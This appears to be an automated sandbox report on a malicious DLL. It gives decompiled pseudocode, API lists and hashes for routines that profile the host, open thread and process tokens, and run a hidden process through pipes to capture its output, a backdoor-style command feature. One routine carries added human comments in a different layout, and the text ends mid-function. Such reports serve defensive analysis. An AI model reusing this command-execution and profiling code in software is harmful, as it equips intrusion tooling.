                                                                                                                                                                                                • Instruction Fuzzy Hash: 10117735D04619BBDB51DBA99C88DEE7AF9EF45681F110064EA11EA240D730CF418764
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                			E1001215A(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                                                                                                                                                                                				signed int _t12;
                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                				int _t15;
                                                                                                                                                                                                				char* _t24;
                                                                                                                                                                                                				char* _t26;
                                                                                                                                                                                                				char* _t28;
                                                                                                                                                                                                				char* _t29;
                                                                                                                                                                                                				signed int _t40;
                                                                                                                                                                                                				char* _t43;
                                                                                                                                                                                                				char* _t45;
                                                                                                                                                                                                				long long* _t47;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t12 = _a20;
                                                                                                                                                                                                				if(_t12 == 0) {
                                                                                                                                                                                                					_t12 = 0x11;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t26 = _a4;
                                                                                                                                                                                                				_push(_t30);
                                                                                                                                                                                                				 *_t47 = _a12;
                                                                                                                                                                                                				_push(_t12);
                                                                                                                                                                                                				_push("%.*g");
                                                                                                                                                                                                				_push(_a8);
                                                                                                                                                                                                				_push(_t26);
                                                                                                                                                                                                				L100122BD();
                                                                                                                                                                                                				_t40 = _t12;
                                                                                                                                                                                                				if(_t40 < 0 || _t40 >= _a8) {
                                                                                                                                                                                                					L19:
                                                                                                                                                                                                					_t13 = _t12 | 0xffffffff;
                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					L10012305();
                                                                                                                                                                                                					_t15 =  *((intOrPtr*)( *_t12));
                                                                                                                                                                                                					if(_t15 != 0x2e) {
                                                                                                                                                                                                						_t24 = strchr(_t26, _t15);
                                                                                                                                                                                                						if(_t24 != 0) {
                                                                                                                                                                                                							 *_t24 = 0x2e;
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
                                                                                                                                                                                                						L11:
                                                                                                                                                                                                						_t43 = strchr(_t26, 0x65);
                                                                                                                                                                                                						_t28 = _t43;
                                                                                                                                                                                                						if(_t43 == 0) {
                                                                                                                                                                                                							L18:
                                                                                                                                                                                                							_t13 = _t40;
                                                                                                                                                                                                							L20:
                                                                                                                                                                                                							return _t13;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t45 = _t43 + 1;
                                                                                                                                                                                                						_t29 = _t28 + 2;
                                                                                                                                                                                                						if( *_t45 == 0x2d) {
                                                                                                                                                                                                							_t45 = _t29;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						while( *_t29 == 0x30) {
                                                                                                                                                                                                							_t29 = _t29 + 1;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						if(_t29 != _t45) {
                                                                                                                                                                                                							E100086E7(_t45, _t29, _t40 - _t29 + _a4);
                                                                                                                                                                                                							_t40 = _t40 + _t45 - _t29;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						goto L18;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_t6 = _t40 + 3; // 0x100109ea
                                                                                                                                                                                                						_t12 = _t6;
                                                                                                                                                                                                						if(_t12 >= _a8) {
                                                                                                                                                                                                							goto L19;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t26[_t40] = 0x302e;
                                                                                                                                                                                                						( &(_t26[2]))[_t40] = 0;
                                                                                                                                                                                                						_t40 = _t40 + 2;
                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}














                                                                                                                                                                                                0x100121db
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100121dd
                                                                                                                                                                                                0x100121e3
                                                                                                                                                                                                0x100121e8
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100121e8
                                                                                                                                                                                                0x100121c5

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: strchr$_snprintflocaleconv
                                                                                                                                                                                                • String ID: %.*g
                                                                                                                                                                                                • API String ID: 1910550357-952554281
                                                                                                                                                                                                • Opcode ID: 633ebe45a3a3a25ebe47d92cc858d0fc9c71f4123d61e7f94c3707c68ec7679f
                                                                                                                                                                                                • Instruction ID: a6f77285e5284d09fbfa46df059558bf7b220b92f92aee1b91355ac70ca0eca3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 633ebe45a3a3a25ebe47d92cc858d0fc9c71f4123d61e7f94c3707c68ec7679f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B2128FA2447457AD311CA68AC85B5F37DCEF09360F160115FD408E282EA79EDE083A0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _snprintfqsort
                                                                                                                                                                                                • String ID: %I64d$false$null$true
                                                                                                                                                                                                • API String ID: 756996078-4285102228
                                                                                                                                                                                                • Opcode ID: f4b213e507d8f97da4b4e9a0b1ecea4deed3accd0e571d64a6845a8ec2942bb3
                                                                                                                                                                                                • Instruction ID: 5291d36293679b7411612c3bc35531584a8851773ff116c659649a865596e283
                                                                                                                                                                                                • Opcode Fuzzy Hash: f4b213e507d8f97da4b4e9a0b1ecea4deed3accd0e571d64a6845a8ec2942bb3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 61E14F71A0024ABFDF15DF64CC45EAF3BA9EF44384F108019FD94DE151E6B1EAA19BA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1000D79E
                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 1000D7A6
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 1000D7BA
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1000D835
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1000D838
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1000D83D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: String$AllocFree
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 344208780-0
                                                                                                                                                                                                • Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                                                                                                                                                                                                • Instruction ID: 32d95d061c17d6e4a2a5c410f5dd007b4a6fcb662acd3d71dd279ae6813cd1ee
                                                                                                                                                                                                • Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D21FB75D00219BFDB00DFA5CC88DAFBBBDEF48294B10849AF505A7250DA70AE05CBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                                                • API String ID: 0-2132903582
                                                                                                                                                                                                • Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                                                                                                                                                                                                • Instruction ID: 27dfd2a2be98919b1514e512a62619df5c07e2d22db7f950380e2dc72d172042
                                                                                                                                                                                                • Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                                                                                                                                                                                                • Instruction Fuzzy Hash: B541E772B04245ABFB14DE988DA6BAE3AA8DF44254F100065FEC2DE243D6F5CED193D1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                			E10012237(char* __eax, char** _a4, long long* _a8) {
                                                                                                                                                                                                				char* _v8;
                                                                                                                                                                                                				long long _v16;
                                                                                                                                                                                                				char* _t9;
                                                                                                                                                                                                				signed char _t11;
                                                                                                                                                                                                				char** _t19;
                                                                                                                                                                                                				char _t22;
                                                                                                                                                                                                				long long _t32;
                                                                                                                                                                                                				long long _t33;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t9 = __eax;
                                                                                                                                                                                                				L10012305();
                                                                                                                                                                                                				_t19 = _a4;
                                                                                                                                                                                                				_t22 =  *__eax;
                                                                                                                                                                                                				if( *_t22 != 0x2e) {
                                                                                                                                                                                                					_t9 = strchr( *_t19, 0x2e);
                                                                                                                                                                                                					if(_t9 != 0) {
                                                                                                                                                                                                						 *_t9 =  *_t22;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				L100122C9();
                                                                                                                                                                                                				 *_t9 =  *_t9 & 0x00000000;
                                                                                                                                                                                                				_t11 = strtod( *_t19,  &_v8);
                                                                                                                                                                                                				asm("fst qword [ebp-0xc]");
                                                                                                                                                                                                				_t32 =  *0x10018250;
                                                                                                                                                                                                				asm("fucomp st1");
                                                                                                                                                                                                				asm("fnstsw ax");
                                                                                                                                                                                                				if((_t11 & 0x00000044) != 0) {
                                                                                                                                                                                                					L5:
                                                                                                                                                                                                					st0 = _t32;
                                                                                                                                                                                                					L100122C9();
                                                                                                                                                                                                					if( *_t11 != 0x22) {
                                                                                                                                                                                                						_t33 = _v16;
                                                                                                                                                                                                						goto L8;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						return _t11 | 0xffffffff;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t33 =  *0x10018258;
                                                                                                                                                                                                					asm("fucomp st1");
                                                                                                                                                                                                					asm("fnstsw ax");
                                                                                                                                                                                                					if((_t11 & 0x00000044) != 0) {
                                                                                                                                                                                                						L8:
                                                                                                                                                                                                						 *_a8 = _t33;
                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}












                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _errno$localeconvstrchrstrtod
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1035490122-0
                                                                                                                                                                                                • Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                                                                                                                                                                                                • Instruction ID: 086184695cbe5e0caddc12f5d504f854cbf045e60efb7ca50336010bc76e979e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                                                                                                                                                                                                • Instruction Fuzzy Hash: EB01D4B9900245BBDB02AF24E90179D7BA4EF4A3A0F2141D0ED806B1E1DB75E9B4C7A4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                			E1000CFC6(void* __ecx) {
                                                                                                                                                                                                				intOrPtr _t11;
                                                                                                                                                                                                				long _t12;
                                                                                                                                                                                                				intOrPtr _t17;
                                                                                                                                                                                                				intOrPtr _t18;
                                                                                                                                                                                                				struct _OSVERSIONINFOA* _t29;
                                                                                                                                                                                                
                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                				_t29 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                				GetCurrentProcess();
                                                                                                                                                                                                				_t11 = E1000BA47();
                                                                                                                                                                                                				_t1 = _t29 + 0x1644; // 0x4cb1ae4
                                                                                                                                                                                                				_t25 = _t1;
                                                                                                                                                                                                				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
                                                                                                                                                                                                				_t12 = GetModuleFileNameW(0, _t1, 0x105);
                                                                                                                                                                                                				_t33 = _t12;
                                                                                                                                                                                                				if(_t12 != 0) {
                                                                                                                                                                                                					_t12 = E10008F9F(_t25, _t33);
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t3 = _t29 + 0x228; // 0x4cb06c8
                                                                                                                                                                                                				 *(_t29 + 0x1854) = _t12;
                                                                                                                                                                                                				 *((intOrPtr*)(_t29 + 0x434)) = E10008F9F(_t3, _t33);
                                                                                                                                                                                                				memset(_t29, 0, 0x9c);
                                                                                                                                                                                                				_t29->dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                                                				GetVersionExA(_t29);
                                                                                                                                                                                                				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
                                                                                                                                                                                                				_t17 = E1000E3F8(_t3);
                                                                                                                                                                                                				_t7 = _t29 + 0x220; // 0x4cb06c0
                                                                                                                                                                                                				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
                                                                                                                                                                                                				_t18 = E1000E433(_t7);
                                                                                                                                                                                                				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
                                                                                                                                                                                                				return _t18;
                                                                                                                                                                                                			}









                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,04CB04A0,?,10003538), ref: 1000CFD2
                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,04CB1AE4,00000105,?,?,04CB04A0,?,10003538), ref: 1000CFF3
                                                                                                                                                                                                • memset.MSVCRT ref: 1000D024
                                                                                                                                                                                                • GetVersionExA.KERNEL32(04CB04A0,04CB04A0,?,10003538), ref: 1000D02F
                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,10003538), ref: 1000D035
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CurrentProcess$FileModuleNameVersionmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3581039275-0
                                                                                                                                                                                                • Opcode ID: e720e9748f940e1c78afa2b0c5b0b5805673a7d0e649baaed66beca1eab902bd
                                                                                                                                                                                                • Instruction ID: 0d16582dd2ff8010aa23be89b22810bf8e349fa17640e1ee15117ca85d12a9b7
                                                                                                                                                                                                • Opcode Fuzzy Hash: e720e9748f940e1c78afa2b0c5b0b5805673a7d0e649baaed66beca1eab902bd
                                                                                                                                                                                                • Instruction Fuzzy Hash: 24015E74901B149BF721DF70C84ABEA7BE5EF84350F00082DE59687251EB74B745CB54
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
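void* E1000B988(void* __ecx) {
	void* _v8;
	void* _t9;

	// 8 = TOKEN_QUERY; 0x3f0 = ERROR_NO_TOKEN (the thread is not impersonating).
	// Try the thread token first, then fall back to the process token.
	if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0 || (GetLastError() == 0x3f0 && OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0)) {
		_t9 = _v8;
	} else {
		_t9 = 0;
	}
	return _t9;
}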






                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 1000B99B
                                                                                                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,1000BABE,74E5F500,10000000), ref: 1000B9A2
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,1000BABE,74E5F500,10000000), ref: 1000B9A9
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BABE,74E5F500,10000000), ref: 1000B9C2
                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,1000BABE,74E5F500,10000000), ref: 1000B9C9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
• Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
• Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
• Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CurrentOpenProcessThreadToken$ErrorLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 102224034-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                			E1000A9F9(signed int __ecx) {
                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                				signed int _v24;
                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                				char _v36;
                                                                                                                                                                                                				struct _SECURITY_ATTRIBUTES _v48;
                                                                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                                                                				char _v64;
                                                                                                                                                                                                				intOrPtr _v76;
                                                                                                                                                                                                				intOrPtr _v80;
                                                                                                                                                                                                				void* _v84;
                                                                                                                                                                                                				short _v92;
                                                                                                                                                                                                				intOrPtr _v96;
                                                                                                                                                                                                				void _v140;
                                                                                                                                                                                                				intOrPtr _t77;
                                                                                                                                                                                                				void* _t79;
                                                                                                                                                                                                				intOrPtr _t85;
                                                                                                                                                                                                				intOrPtr _t87;
                                                                                                                                                                                                				intOrPtr _t89;
                                                                                                                                                                                                				intOrPtr _t92;
                                                                                                                                                                                                				intOrPtr _t98;
                                                                                                                                                                                                				intOrPtr _t100;
                                                                                                                                                                                                				intOrPtr _t102;
                                                                                                                                                                                                				long _t111;
                                                                                                                                                                                                				intOrPtr _t115;
                                                                                                                                                                                                				intOrPtr _t126;
                                                                                                                                                                                                				void* _t127;
                                                                                                                                                                                                				void* _t128;
                                                                                                                                                                                                				void* _t129;
                                                                                                                                                                                                				void* _t130;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t111 = 0;
                                                                                                                                                                                                				_v24 = __ecx;
                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                				_t127 = 0;
                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                				_v48.nLength = 0xc;
                                                                                                                                                                                                				_v48.lpSecurityDescriptor = 0;
                                                                                                                                                                                                				_v48.bInheritHandle = 1;
                                                                                                                                                                                                				_v28 = 0;
                                                                                                                                                                                                				memset( &_v140, 0, 0x44);
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				_t130 = _t129 + 0xc;
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
                                                                                                                                                                                                					L18:
                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
                                                                                                                                                                                                					L13:
                                                                                                                                                                                                					E100085FB( &_v28, 0);
                                                                                                                                                                                                					if(_v20 != 0) {
                                                                                                                                                                                                						_t77 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                						 *((intOrPtr*)(_t77 + 0x30))(_v20);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					if(_v8 != 0) {
                                                                                                                                                                                                						_t115 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                						 *((intOrPtr*)(_t115 + 0x30))(_v8);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					return _t111;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t79 = _v16;
                                                                                                                                                                                                				_v76 = _t79;
                                                                                                                                                                                                				_v80 = _t79;
                                                                                                                                                                                                				_v84 = _v12;
                                                                                                                                                                                                				_v140 = 0x44;
                                                                                                                                                                                                				_v96 = 0x101;
                                                                                                                                                                                                				_v92 = 0;
                                                                                                                                                                                                				_t126 = E100085E5(0x1001);
                                                                                                                                                                                                				_v28 = _t126;
                                                                                                                                                                                                				if(_t126 == 0) {
                                                                                                                                                                                                					goto L18;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_push( &_v64);
                                                                                                                                                                                                				_push( &_v140);
                                                                                                                                                                                                				_t85 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(0x8000000);
                                                                                                                                                                                                				_push(1);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(_v24);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
                                                                                                                                                                                                					goto L13;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t87 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                				 *((intOrPtr*)(_t87 + 0x30))(_v12);
                                                                                                                                                                                                				_t89 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                				 *((intOrPtr*)(_t89 + 0x30))(_v16);
                                                                                                                                                                                                				_v24 = _v24 & 0;
                                                                                                                                                                                                				do {
                                                                                                                                                                                                					_t92 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
                                                                                                                                                                                                					 *((char*)(_v24 + _t126)) = 0;
                                                                                                                                                                                                					if(_t111 == 0) {
                                                                                                                                                                                                						_t127 = E10009187(_t126, 0);
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                						_push(_t126);
                                                                                                                                                                                                						_v32 = _t127;
                                                                                                                                                                                                						_t127 = E10009273(_t127);
                                                                                                                                                                                                						E100085FB( &_v32, 0xffffffff);
                                                                                                                                                                                                						_t130 = _t130 + 0x14;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t111 = _t127;
                                                                                                                                                                                                					_v32 = _t127;
                                                                                                                                                                                                				} while (_v36 != 0);
                                                                                                                                                                                                				_push( &_v36);
                                                                                                                                                                                                				_push(E1000C3BB(_t127));
                                                                                                                                                                                                				_t98 =  *0x1001e68c; // 0x4d2fa40
                                                                                                                                                                                                				_push(_t127);
                                                                                                                                                                                                				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
                                                                                                                                                                                                					L12:
                                                                                                                                                                                                					_t100 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                					 *((intOrPtr*)(_t100 + 0x30))(_v64);
                                                                                                                                                                                                					_t102 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                					 *((intOrPtr*)(_t102 + 0x30))(_v60);
                                                                                                                                                                                                					goto L13;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t128 = E10009237(_t127);
                                                                                                                                                                                                				if(_t128 == 0) {
                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				E100085FB( &_v32, 0);
                                                                                                                                                                                                				return _t128;
                                                                                                                                                                                                			}




































                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 1000AA36
                                                                                                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA5A
                                                                                                                                                                                                • CreatePipe.KERNEL32(1000658A,?,0000000C,00000000), ref: 1000AA71
                                                                                                                                                                                                  • Part of subcall function 100085E5: HeapAlloc.KERNEL32(00000008,?,?,10008F65,00000100,?,10005FAC), ref: 100085F3
                                                                                                                                                                                                  • Part of subcall function 100085FB: HeapFree.KERNEL32(00000000,00000000,00000001,000000FF,10006024), ref: 10008641
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateHeapPipe$AllocFreememset
                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                • API String ID: 488076629-2746444292
                                                                                                                                                                                                • Opcode ID: 7888eb1a94e5491fbf89c4a504d4dbb72c6cd02333e80cd0989224674b7922a4
                                                                                                                                                                                                • Instruction ID: ff1d65ae2061de98d33345d250650d44614cd0b063b1efaf68e38ccaf744cb78
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7888eb1a94e5491fbf89c4a504d4dbb72c6cd02333e80cd0989224674b7922a4
                                                                                                                                                                                                • Instruction Fuzzy Hash: F1511875D00219AFEB41CFA4CC85FDEB7B9FB08380F514169F600E7255EB74AA458B61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                			E1000C510(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                				void _v140;
                                                                                                                                                                                                				signed char _t14;
                                                                                                                                                                                                				char _t15;
                                                                                                                                                                                                				intOrPtr _t20;
                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                				intOrPtr _t32;
                                                                                                                                                                                                				WCHAR* _t34;
                                                                                                                                                                                                				intOrPtr _t35;
                                                                                                                                                                                                				struct HINSTANCE__* _t37;
                                                                                                                                                                                                				int _t38;
                                                                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                                                                				void* _t47;
                                                                                                                                                                                                				intOrPtr _t50;
